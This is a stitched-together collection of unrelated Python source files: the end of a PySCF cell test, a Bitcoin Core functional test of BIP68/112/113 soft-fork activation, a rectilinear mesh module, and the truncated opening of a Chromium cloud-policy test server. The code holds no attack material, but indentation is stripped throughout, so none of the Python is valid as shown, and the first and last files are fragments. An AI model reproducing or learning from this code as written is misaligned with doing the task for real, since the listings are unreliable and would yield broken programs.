self.assertEqual(cell.KCCSD().__class__, cc.kccsd_rhf.KRCCSD)
self.assertEqual(cell.KTDA().__class__, tdscf.krhf.TDA)
self.assertEqual(cell.KTDBP86().__class__, tdscf.krks.TDDFTNoHybrid)
self.assertRaises(AttributeError, lambda: cell.xyz)
self.assertRaises(AttributeError, lambda: cell.TDxyz)
if __name__ == '__main__':
print("Full Tests for pbc.gto.cell")
unittest.main()
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test activation of the first version bits soft fork.
This soft fork will activate the following BIPS:
BIP 68 - nSequence relative lock times
BIP 112 - CHECKSEQUENCEVERIFY
BIP 113 - MedianTimePast semantics for nLockTime
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 82 blocks whose coinbases will be used to generate inputs for our tests
mine 61 blocks to transition from DEFINED to STARTED
mine 144 blocks, only 100 of which signal readiness, in order to fail to change state this period
mine 144 blocks with 108 signaling and verify STARTED->LOCKED_IN
mine 140 blocks and seed the block chain with the 82 inputs we will use for our tests at height 572
mine 3 blocks and verify still at LOCKED_IN and test that enforcement has not triggered
mine 1 block and test that enforcement has triggered (which triggers ACTIVE)
Test BIP 113 is enforced
Mine 4 blocks so next height is 580 and test BIP 68 is enforced for time and height
Mine 1 block so next height is 581 and test BIP 68 now passes time but not height
Mine 1 block so next height is 582 and test BIP 68 now passes time and height
Test that BIP 112 is enforced
Various transactions will be used to test that the BIPs' rules are not enforced before the soft fork activates,
and that after the soft fork activates transactions pass and fail as they should according to the rules.
For each BIP, transactions of versions 1 and 2 will be tested.
----------------
BIP 113:
bip113tx - modify the nLocktime variable
BIP 68:
bip68txs - 16 txs with nSequence relative locktime of 10 with various bits set as per the relative_locktimes below
BIP 112:
bip112txs_vary_nSequence - 16 txs with nSequence relative_locktimes of 10 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_nSequence_9 - 16 txs with nSequence relative_locktimes of 9 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_OP_CSV - 16 txs with nSequence = 10 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112txs_vary_OP_CSV_9 - 16 txs with nSequence = 9 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112tx_special - test negative argument to OP_CSV
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.mininode import ToHex, CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block
from test_framework.comptool import TestInstance, TestManager
from test_framework.script import *
from io import BytesIO
import time
base_relative_locktime = 10
seq_disable_flag = 1<<31
seq_random_high_bit = 1<<25
seq_type_flag = 1<<22
seq_random_low_bit = 1<<18
# b31,b25,b22,b18 represent the 31st, 25th, 22nd and 18th bits respectively in the nSequence field
# relative_locktimes[b31][b25][b22][b18] is a base_relative_locktime with the indicated bits set if their indices are 1
relative_locktimes = []
for b31 in range(2):
b25times = []
for b25 in range(2):
b22times = []
for b22 in range(2):
b18times = []
for b18 in range(2):
rlt = base_relative_locktime
if (b31):
rlt = rlt | seq_disable_flag
if (b25):
rlt = rlt | seq_random_high_bit
if (b22):
rlt = rlt | seq_type_flag
if (b18):
rlt = rlt | seq_random_low_bit
b18times.append(rlt)
b22times.append(b18times)
b25times.append(b22times)
relative_locktimes.append(b25times)
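# For example, relative_locktimes[1][0][1][0] == base_relative_locktime | seq_disable_flag | seq_type_flag,
# i.e. the base locktime of 10 with bit 31 (disable flag) and bit 22 (time-based type flag) set.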
def all_rlt_txs(txarray):
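    """Flattens the 2x2x2x2 nested tx array into a flat list of 16 transactions."""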
txs = []
for b31 in range(2):
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
txs.append(txarray[b31][b25][b22][b18])
return txs
class BIP68_112_113Test(ComparisonTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
def setup_network(self):
# Must set the blockversion for this test
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1', '-blockversion=4']],
binary=[self.options.testbinary])
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
test.run()
def send_generic_input_tx(self, node, coinbases):
amount = Decimal("49.99")
return node.sendrawtransaction(ToHex(self.sign_transaction(node, self.create_transaction(node, node.getblock(coinbases.pop())['tx'][0], self.nodeaddress, amount))))
def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(rawtx))
tx.deserialize(f)
return tx
def sign_transaction(self, node, unsignedtx):
rawtx = ToHex(unsignedtx)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def generate_blocks(self, number, version, test_blocks = []):
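        """Creates `number` blocks (coinbase only) with the given block version on top of
        self.tip, appending [block, True] entries to test_blocks and advancing the tip,
        tip height and last block time."""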
for i in range(number):
block = self.create_test_block([], version)
test_blocks.append([block, True])
self.last_block_time += 600
self.tip = block.sha256
self.tipheight += 1
return test_blocks
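    # 536870912 == 0x20000000: the BIP9 version-bits base block version with no deployment bits set.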
def create_test_block(self, txs, version = 536870912):
block = create_block(self.tip, create_coinbase(self.tipheight + 1), self.last_block_time + 600)
block.nVersion = version
block.vtx.extend(txs)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
return block
def create_bip68txs(self, bip68inputs, txversion, locktime_delta = 0):
txs = []
assert(len(bip68inputs) >= 16)
i = 0
for b31 in range(2):
b25txs = []
for b25 in range(2):
b22txs = []
for b22 in range(2):
b18txs = []
for b18 in range(2):
tx = self.create_transaction(self.nodes[0], bip68inputs[i], self.nodeaddress, Decimal("49.98"))
i += 1
tx.nVersion = txversion
tx.vin[0].nSequence = relative_locktimes[b31][b25][b22][b18] + locktime_delta
b18txs.append(self.sign_transaction(self.nodes[0], tx))
b22txs.append(b18txs)
b25txs.append(b22txs)
txs.append(b25txs)
return txs
def create_bip112special(self, input, txversion):
tx = self.create_transaction(self.nodes[0], input, self.nodeaddress, Decimal("49.98"))
tx.nVersion = txversion
signtx = self.sign_transaction(self.nodes[0], tx)
signtx.vin[0].scriptSig = CScript([-1, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
return signtx
def create_bip112txs(self, bip112inputs, varyOP_CSV, txversion, locktime_delta = 0):
txs = []
assert(len(bip112inputs) >= 16)
i = 0
for b31 in range(2):
b25txs = []
for b25 in range(2):
b22txs = []
for b22 in range(2):
b18txs = []
for b18 in range(2):
tx = self.create_transaction(self.nodes[0], bip112inputs[i], self.nodeaddress, Decimal("49.98"))
i += 1
if (varyOP_CSV): # if varying OP_CSV, nSequence is fixed
tx.vin[0].nSequence = base_relative_locktime + locktime_delta
else: # vary nSequence instead, OP_CSV is fixed
tx.vin[0].nSequence = relative_locktimes[b31][b25][b22][b18] + locktime_delta
tx.nVersion = txversion
signtx = self.sign_transaction(self.nodes[0], tx)
if (varyOP_CSV):
signtx.vin[0].scriptSig = CScript([relative_locktimes[b31][b25][b22][b18], OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
else:
signtx.vin[0].scriptSig = CScript([base_relative_locktime, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
b18txs.append(signtx)
b22txs.append(b18txs)
b25txs.append(b22txs)
txs.append(b25txs)
return txs
def get_tests(self):
long_past_time = int(time.time()) - 600 * 1000 # enough to build up to 1000 blocks 10 minutes apart without worrying about getting into the future
self.nodes[0].setmocktime(long_past_time - 100) # enough so that the generated blocks will still all be before long_past_time
self.coinbase_blocks = self.nodes[0].generate(1 + 16 + 2*32 + 1) # 82 blocks generated for inputs
self.nodes[0].setmocktime(0) # set time back to present so yielded blocks aren't in the future as we advance last_block_time
self.tipheight = 82 # height of the next block to build
self.last_block_time = long_past_time
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.nodeaddress = self.nodes[0].getnewaddress()
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'defined')
test_blocks = self.generate_blocks(61, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 1
# Advanced from DEFINED to STARTED, height = 143
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
# Fail to achieve LOCKED_IN 100 out of 144 signal bit 0
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 536936448, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False) # 2
# Failed to advance past STARTED, height = 287
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
# 108 out of 144 signal bit 0 to achieve lock-in
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 536936448, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False) # 3
# Advanced from STARTED to LOCKED_IN, height = 431
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# 140 more version 4 blocks
test_blocks = self.generate_blocks(140, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 4
### Inputs at height = 572
# Put inputs for all tests in the chain at height 572 (tip now = 571) (time increases by 600s per block)
# Note we reuse inputs for v1 and v2 txs so must test these separately
# 16 normal inputs
bip68inputs = []
for i in range(16):
bip68inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
# 2 sets of 16 inputs with 10 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112basicinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
bip112basicinputs.append(inputs)
# 2 sets of 16 varied inputs with (relative_lock_time) OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112diverseinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks))
bip112diverseinputs.append(inputs)
# 1 special input with -1 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112specialinput = self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks)
# 1 normal input
bip113input = self.send_generic_input_tx(self.nodes[0], self.coinbase_blocks)
self.nodes[0].setmocktime(self.last_block_time + 600)
inputblockhash = self.nodes[0].generate(1)[0] # 1 block generated for inputs to be in chain at height 572
self.nodes[0].setmocktime(0)
self.tip = int("0x" + inputblockhash, 0)
self.tipheight += 1
self.last_block_time += 600
assert_equal(len(self.nodes[0].getblock(inputblockhash,True)["tx"]), 82+1)
# 2 more version 4 blocks
test_blocks = self.generate_blocks(2, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 5
# Not yet advanced to ACTIVE, height = 574 (will activate for block 576, not 575)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Test both version 1 and version 2 transactions for all tests
# BIP113 test transaction will be modified before each use to put in appropriate block time
bip113tx_v1 = self.create_transaction(self.nodes[0], bip113input, self.nodeaddress, Decimal("49.98"))
bip113tx_v1.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v1.nVersion = 1
bip113tx_v2 = self.create_transaction(self.nodes[0], bip113input, self.nodeaddress, Decimal("49.98"))
bip113tx_v2.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v2.nVersion = 2
# For BIP68 test all 16 relative sequence locktimes
bip68txs_v1 = self.create_bip68txs(bip68inputs, 1)
bip68txs_v2 = self.create_bip68txs(bip68inputs, 2)
# For BIP112 test:
# 16 relative sequence locktimes of 10 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_v1 = self.create_bip112txs(bip112basicinputs[0], False, 1)
bip112txs_vary_nSequence_v2 = self.create_bip112txs(bip112basicinputs[0], False, 2)
# 16 relative sequence locktimes of 9 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_9_v1 = self.create_bip112txs(bip112basicinputs[1], False, 1, -1)
bip112txs_vary_nSequence_9_v2 = self.create_bip112txs(bip112basicinputs[1], False, 2, -1)
# sequence lock time of 10 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_v1 = self.create_bip112txs(bip112diverseinputs[0], True, 1)
bip112txs_vary_OP_CSV_v2 = self.create_bip112txs(bip112diverseinputs[0], True, 2)
# sequence lock time of 9 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_9_v1 = self.create_bip112txs(bip112diverseinputs[1], True, 1, -1)
bip112txs_vary_OP_CSV_9_v2 = self.create_bip112txs(bip112diverseinputs[1], True, 2, -1)
# -1 OP_CSV OP_DROP input
bip112tx_special_v1 = self.create_bip112special(bip112specialinput, 1)
bip112tx_special_v2 = self.create_bip112special(bip112specialinput, 2)
### TESTING ###
##################################
### Before Soft Forks Activate ###
##################################
# All txs should pass
### Version 1 txs ###
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
success_txs.append(bip113signed1)
success_txs.append(bip112tx_special_v1)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v1))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v1))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v1))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 6
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Version 2 txs ###
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
success_txs.append(bip113signed2)
success_txs.append(bip112tx_special_v2)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v2))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v2))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v2))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 7
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# 1 more version 4 block to get us to height 575 so the fork should now be active for the next block
test_blocks = self.generate_blocks(1, 4)
yield TestInstance(test_blocks, sync_every_block=False) # 8
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'active')
#################################
### After Soft Forks Activate ###
#################################
### BIP 113 ###
# BIP 113 tests should now fail regardless of version number if nLockTime isn't satisfied by new rules
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
yield TestInstance([[self.create_test_block([bip113tx]), False]]) # 9,10
# BIP 113 tests should now pass if the locktime is < MTP
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed1 = self.sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed2 = self.sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
yield TestInstance([[self.create_test_block([bip113tx]), True]]) # 11,12
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Next block height = 580 after 4 blocks of random version
test_blocks = self.generate_blocks(4, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 13
### BIP 68 ###
### Version 1 txs ###
# All still pass
success_txs = []
success_txs.extend(all_rlt_txs(bip68txs_v1))
yield TestInstance([[self.create_test_block(success_txs), True]]) # 14
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Version 2 txs ###
bip68success_txs = []
# All txs with SEQUENCE_LOCKTIME_DISABLE_FLAG set pass
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
bip68success_txs.append(bip68txs_v2[1][b25][b22][b18])
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 15
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# All txs without flag fail as we are at delta height = 8 < 10 and delta time = 8 * 600 < 10 * 512
bip68timetxs = []
for b25 in range(2):
for b18 in range(2):
bip68timetxs.append(bip68txs_v2[0][b25][1][b18])
for tx in bip68timetxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 16 - 19
bip68heighttxs = []
for b25 in range(2):
for b18 in range(2):
bip68heighttxs.append(bip68txs_v2[0][b25][0][b18])
for tx in bip68heighttxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 20 - 23
# Advance one block to 581
test_blocks = self.generate_blocks(1, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 24
# Height txs should fail and time txs should now pass 9 * 600 > 10 * 512
bip68success_txs.extend(bip68timetxs)
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 25
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
for tx in bip68heighttxs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 26 - 29
# Advance one block to 582
test_blocks = self.generate_blocks(1, 1234)
yield TestInstance(test_blocks, sync_every_block=False) # 30
# All BIP 68 txs should pass
bip68success_txs.extend(bip68heighttxs)
yield TestInstance([[self.create_test_block(bip68success_txs), True]]) # 31
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### BIP 112 ###
### Version 1 txs ###
# -1 OP_CSV tx should fail
yield TestInstance([[self.create_test_block([bip112tx_special_v1]), False]]) #32
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 1 txs should still pass
success_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_OP_CSV_v1[1][b25][b22][b18])
success_txs.append(bip112txs_vary_OP_CSV_9_v1[1][b25][b22][b18])
yield TestInstance([[self.create_test_block(success_txs), True]]) # 33
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV, version 1 txs should now fail
fail_txs = []
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_OP_CSV_v1[0][b25][b22][b18])
fail_txs.append(bip112txs_vary_OP_CSV_9_v1[0][b25][b22][b18])
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 34 - 81
### Version 2 txs ###
# -1 OP_CSV tx should fail
yield TestInstance([[self.create_test_block([bip112tx_special_v2]), False]]) #82
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 2 txs should pass (all sequence locks are met)
success_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_OP_CSV_v2[1][b25][b22][b18]) # 8/16 of vary_OP_CSV
success_txs.append(bip112txs_vary_OP_CSV_9_v2[1][b25][b22][b18]) # 8/16 of vary_OP_CSV_9
yield TestInstance([[self.create_test_block(success_txs), True]]) # 83
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
## SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV for all remaining txs ##
# All txs with nSequence 9 should fail either due to earlier mismatch or failing the CSV check
fail_txs = []
fail_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2)) # 16/16 of vary_nSequence_9
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_OP_CSV_9_v2[0][b25][b22][b18]) # 16/16 of vary_OP_CSV_9
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 84 - 107
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in nSequence, tx should fail
fail_txs = []
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_nSequence_v2[1][b25][b22][b18]) # 8/16 of vary_nSequence
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 108-115
# If sequencelock types mismatch, tx should fail
fail_txs = []
for b25 in range(2):
for b18 in range(2):
fail_txs.append(bip112txs_vary_nSequence_v2[0][b25][1][b18]) # 12/16 of vary_nSequence
fail_txs.append(bip112txs_vary_OP_CSV_v2[0][b25][1][b18]) # 12/16 of vary_OP_CSV
for tx in fail_txs:
yield TestInstance([[self.create_test_block([tx]), False]]) # 116-123
        # Remaining txs should pass; this just tests that masking of the unused nSequence bits works properly
success_txs = []
for b25 in range(2):
for b18 in range(2):
success_txs.append(bip112txs_vary_nSequence_v2[0][b25][0][b18]) # 16/16 of vary_nSequence
success_txs.append(bip112txs_vary_OP_CSV_v2[0][b25][0][b18]) # 16/16 of vary_OP_CSV
yield TestInstance([[self.create_test_block(success_txs), True]]) # 124
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Additional test, of checking that comparison of two time types works properly
time_txs = []
for b25 in range(2):
for b18 in range(2):
tx = bip112txs_vary_OP_CSV_v2[0][b25][1][b18]
tx.vin[0].nSequence = base_relative_locktime | seq_type_flag
signtx = self.sign_transaction(self.nodes[0], tx)
time_txs.append(signtx)
yield TestInstance([[self.create_test_block(time_txs), True]]) # 125
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
### Missing aspects of test
## Testing empty stack fails
if __name__ == '__main__':
BIP68_112_113Test().main()
|
|
# -*- coding: utf-8 -*-
from __future__ import division
__author__ = 'marco.muetze <at> tu-dresden.de'
from .helper import check_bounds_and_get_dimension
from .prototypes import Mesh
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def calculate_bounds(axes):
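    """Returns (lower, upper) bound tuples for a sequence of 1D axis arrays,
    handling axes stored in either ascending or descending order."""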
lower = []
upper = []
num_of_axes = len(axes)
for idx in range(num_of_axes):
if axes[idx][0] < axes[idx][-1]:
lower.append(axes[idx][0])
upper.append(axes[idx][-1])
else:
upper.append(axes[idx][0])
lower.append(axes[idx][-1])
return tuple(lower), tuple(upper)
def calculate_shape(axes):
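    """Returns the number of nodes along each axis as a tuple.
    Accepts a single 1D np.ndarray or a tuple/list of np.ndarrays."""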
shape = []
if type(axes) in (tuple, list):
for dim in range(len(axes)):
if type(axes[dim]) is np.ndarray:
shape.append(len(axes[dim]))
else:
raise TypeError
elif type(axes) is np.ndarray:
shape.append(len(axes))
else:
raise TypeError
return tuple(shape)
def calculate_center(bounds):
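    """Returns the geometric center of the given (lower, upper) bounds as a tuple."""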
dimension = check_bounds_and_get_dimension(bounds)
center_position = []
for i in range(dimension):
center_position.append((bounds[1][i] + bounds[0][i]) * 0.5)
return tuple(center_position)
class RectilinearMesh(Mesh):
interpolator = RegularGridInterpolator
def __init__(self, axes, axes_names=('x', 'y', 'z'), unit='m'):
""" RectilinearMesh
:param axes: Values of axis nodes as tuple of 1D np.arrays.
:param axes_names: Coordinate system axes names.
:param unit: Unit of mesh values.
"""
bounds = calculate_bounds(axes)
center = calculate_center(bounds)
shape = calculate_shape(axes)
self.__axes = axes
self.__shape = shape
Mesh.__init__(self, bounds, axes_names=axes_names, unit=unit)
self.__center_index = self.nearest_node(center)[0]
def __getitem__(self, item):
        # Massage item so that it works as a tuple of slices!
new_axes = []
# This only works when len(item) equals the dimension of the mesh and will not work for None!
for i, x in enumerate(item):
new_axes.append(self.axes[i][x])
return RectilinearMesh(tuple(new_axes), self.axes_names, self.unit)
def copy(self):
new_axes = []
for axe in self.axes:
new_axes.append(axe.copy())
return RectilinearMesh(tuple(new_axes), self.axes_names, self.unit)
def shift(self, offset):
# Update bounds!
low = np.array(self.bounds[0])
high = np.array(self.bounds[1])
tmp = np.array(offset)
self._bounds = (tuple(low+tmp), tuple(high+tmp))
assert len(offset) == len(self.axes)
new_axes = []
for axe in self.axes:
new_axes.append(axe.copy())
for i, d in enumerate(offset):
new_axes[i] += d
self.__axes = tuple(new_axes)
return self
@property
def pitch(self):
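        """Node spacings along each axis, as a tuple of arrays of length len(axis) - 1."""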
dimension = self._dimension # len(self._axes)
pitch = [0.] * dimension
for dim in range(dimension):
axis_len = len(self.__axes[dim])
            # spacings between neighboring nodes along this axis
coordinates = np.zeros(axis_len-1)
for idx in range(axis_len-1):
coordinates[idx] = (self.__axes[dim][idx+1]-self.__axes[dim][idx])
pitch[dim] = coordinates.copy()
return tuple(pitch)
@property
def axes(self):
return self.__axes
@property
def shape(self):
return self.__shape
@property
def center_index(self):
return self.__center_index
@property
def minimum_pitch(self):
""" Returns the minimal pitch between two neighboring nodes of the mesh in each direction.
:return: Minimal pitch in each direction.
"""
pitch = self.pitch
minimal_pitch = []
for p in pitch:
minimal_pitch.append(min(p))
return min(minimal_pitch)
def nearest_node(self, position):
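        """Returns the index tuple, node position tuple and Euclidean distance of the mesh
        node closest to `position`. Raises ValueError if `position` is outside the bounds."""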
idx = []
point = []
for i in range(len(self.axes)):
if position[i] < self.bounds[0][i] or position[i] > self.bounds[1][i]:
raise ValueError('The given position is outside the mesh bounds!')
tmp = (np.abs(self.axes[i]-position[i])).argmin()
idx.append(int(tmp))
point.append(self.axes[i][tmp])
return tuple(idx), tuple(point), np.linalg.norm(np.asarray(position)-np.asarray(point))
def surrounding_nodes(self, position):
""" Returns nearest node indices and direction of opposite node.
:param position: Position inside the mesh to search nearest node for as (x,y,z)
:return: Nearest node indices and direction of opposite node.
"""
n_node_index, n_node_position, n_node_error = self.nearest_node(position)
if n_node_error == 0.0:
index_mod = []
for i in range(len(n_node_index)):
new_point = np.asarray(n_node_position)
new_point[i] += 1.e-5*np.abs(new_point[i])
try:
self.nearest_node(tuple(new_point))
index_mod.append(-1)
except ValueError:
index_mod.append(1)
else:
# Check if node_position is larger or smaller in resp. axes than position
index_mod = []
for i in range(len(n_node_index)):
if n_node_position[i] > position[i]:
index_mod.append(-1)
else:
index_mod.append(1)
return tuple(n_node_index), tuple(index_mod)
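# Minimal usage sketch (illustrative only; assumes the Mesh base class from .prototypes
# requires no arguments beyond those passed by RectilinearMesh.__init__):
#   axes = (np.linspace(0., 1., 11), np.linspace(0., 2., 21), np.linspace(0., 3., 31))
#   mesh = RectilinearMesh(axes)
#   idx, node, dist = mesh.nearest_node((0.48, 1.03, 1.52))
#   near_idx, direction = mesh.surrounding_nodes((0.48, 1.03, 1.52))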
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A bare-bones test server for testing cloud policy support.
This implements a simple cloud policy test server that can be used to test
chrome's device management service client. The policy information is read from
the file named device_management in the server's data directory. It contains
enforced and recommended policies for the device and user scope, and a list
of managed users.
The format of the file is JSON. The root dictionary contains a list under the
key "managed_users". It contains auth tokens for which the server will claim
that the user is managed. The token string "*" indicates that all users are
claimed to be managed. Other keys in the root dictionary identify request
scopes. The user-request scope is described by a dictionary that holds two
sub-dictionaries: "mandatory" and "recommended". Both of these hold the policy
definitions as key/value stores; their format is identical to what the Linux
implementation reads from /etc.
The device scope holds the policy definitions directly as key/value stores in the
protobuf format.
Example:
{
"google/chromeos/device" : {
"guest_mode_enabled" : false
},
"google/chromeos/user" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org",
"IncognitoEnabled" : false
},
"recommended" : {
"JavascriptEnabled": false
}
},
"google/chromeos/publicaccount/[email protected]" : {
"mandatory" : {
"HomepageLocation" : "http://www.chromium.org"
},
"recommended" : {
}
},
"managed_users" : [
"secret123456"
],
"current_key_index": 0,
"robot_api_auth_code": "fake_auth_code",
"invalidation_source": 1025,
"invalidation_name": "UENUPOL"
}
"""
import BaseHTTPServer
import cgi
import google.protobuf.text_format
import hashlib
import logging
import os
import random
import re
import sys
import time
import tlslite
import tlslite.api
import tlslite.utils
import tlslite.utils.cryptomath
import urlparse
# The name and availability of the json module varies in python versions.
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
json = None
import asn1der
import testserver_base
import device_management_backend_pb2 as dm
import cloud_policy_pb2 as cp
import chrome_extension_policy_pb2 as ep
# Device policy is only available on Chrome OS builds.
try:
import chrome_device_policy_pb2 as dp
except ImportError:
dp = None
# ASN.1 object identifier for PKCS#1/RSA.
PKCS1_RSA_OID = '\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01'
# SHA256 sum of "0".
SHA256_0 = hashlib.sha256('0').digest()
# List of bad machine identifiers that trigger the |valid_serial_number_missing|
